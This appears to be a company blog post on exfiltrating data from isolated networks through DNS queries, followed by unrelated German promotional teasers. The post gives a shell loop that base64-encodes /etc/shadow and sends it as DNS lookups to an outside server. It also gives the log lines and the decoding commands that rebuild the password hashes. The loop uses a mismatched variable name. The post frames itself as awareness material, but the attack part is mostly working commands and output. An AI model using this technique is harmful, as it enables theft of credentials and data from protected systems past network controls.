IT Security

Transport Protected

19.12.2019

transport protected data out of high secured zones by dns requests

I often spend some time in highly isolated and secured networks.
Companies spend a lot of money to protect their sensitive data.

But so far I see often that restrictions are not tight enough.

Since layer7 inspection of https traffic has become a standard, DNS filtering has not.

Getting data out of secure zones by DNS requests is quite easy, so lets start with this example.

What you need to get it running:

A server within a secured Zone to push some data out.
A Server in the internet where you can read the logs.

cat /etc/shadow | base64 -w63 | while read line
do 
   host  -tA $L.debug2.org 1.2.3.4
done

This command encoded and transferred the linux password file to my dns server, listening at IP 1.2.3.4
On the target side, I easily can reconstruct the data:

[root@ns ~]# grep debug2.org /var/log/messages | tail -2
Oct 19 08:50:27 ns named[1017]: client 8.7.11.1#55075 (QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org): view default: query (cache) 'QUFtdnRibHUyL0d6LzoxNzc2MDowOjk5OTk5Ojc6OjoKX2Nocm9ueToqOjE3NzY.debug2.org/A/IN' denied
Oct 19 08:50:27 pan named[1017]: client 8.7.11.1#48274 (wOjA6OTk5OTk6Nzo6Ogo=.debug2.org): view default: query (cache) 'wOjA6OTk5OTk6Nzo6Ogo=.debug2.org/A/IN' denied
<br>[root@pan ~]# grep debug2.org /var/log/messages | cut -d'(' -f2- | cut -d'.' -f1 | base64 -d
root:$6$QMXJFcGY$TkVB1fdrSBzM9nlhO...rsPIc3F.35TN2sloEuQofCFO4SSE9Z3/:17760:0:99999:7:::
[...]
_chrony:*:17760:0:99999:7:::

Sometimes, character cases get converted to capital or verse, but in this case it is easy to do the same with base32 or uuencode.

This is not mentioned to be used against the law, but should help to get aware of security ... and its problems.

Thanks

Anfrage

Jetzt anmelden

uniQacademy

Ivanti Workspace Control EoL - wie weiter?

26.01.2025

In 45 gemeinsamen Onlineminuten gehen wir auf die individuellen Konsequenzen dieser Ankündigung für Ihr Unternehmen ein. Wir beleuchten die Situation aus Ihrem Blickwinkel und zeigen Ihnen innovative Lösungswege auf. Hadern Sie nicht, sondern erfahren Sie, wie Sie den Herausforderungen nicht nur begegnen, sondern sogar davon profitieren können.

Jetzt anmelden und mehr erfahren!

⟶

Digital Workspace

Microsoft Copilot

16.01.2024

Wir freuen uns, Ihnen mitteilen zu können, dass Copilot nun auch als (CSP) für Kunden aller Grössen verfügbar ist. Alle sprechen darüber, alle wollen es, aber nur die wenigsten sind auf das vorbereitet. Diejenigen, die sich jetzt richtig vorbereiten, werden in naher Zukunft die vollen Features nutzen können und gegenüber den anderen die Nase vorn haben. Mit einer Business Premium einer E3 oder E5 Lizenz sind Sie bestens ausgestattet und aus Sicht der Lizenzen eigentlich startklar.

⟶

IT-Infrastruktur

Green IT für KMU - ISO 14001

19.06.2023

by Tim Candrian by Petra Gianella

Das Thema Nachhaltigkeit und die Verringerung des ökologischen Fussabdrucks haben sich in Unternehmen seit geraumer Zeit zu einem prominenten Diskussionsthema entwickelt und deren Einfluss auf eine positive Reputation nimmt kontinuierlich zu. In Anbetracht der hohen Umweltauswirkungen hat die Technologiebranche ihre Verantwortung erkannt und entsprechende Massnahmen getroffen. Allerdings geht es hier nicht nur um die Verantwortung der Technologiebranche selbst, sondern auch um die Käufer und somit die Kunden, welche die Infrastruktur betreiben und letztendlich um die individuelle Verantwortung jedes Arbeitnehmenden, der von dieser profitiert. Jede einzelne Person trägt dazu bei, indem sie nachhaltige Praktiken unterstützt und Entscheidungen trifft, die den ökologischen Fussabdruck minimieren.

⟶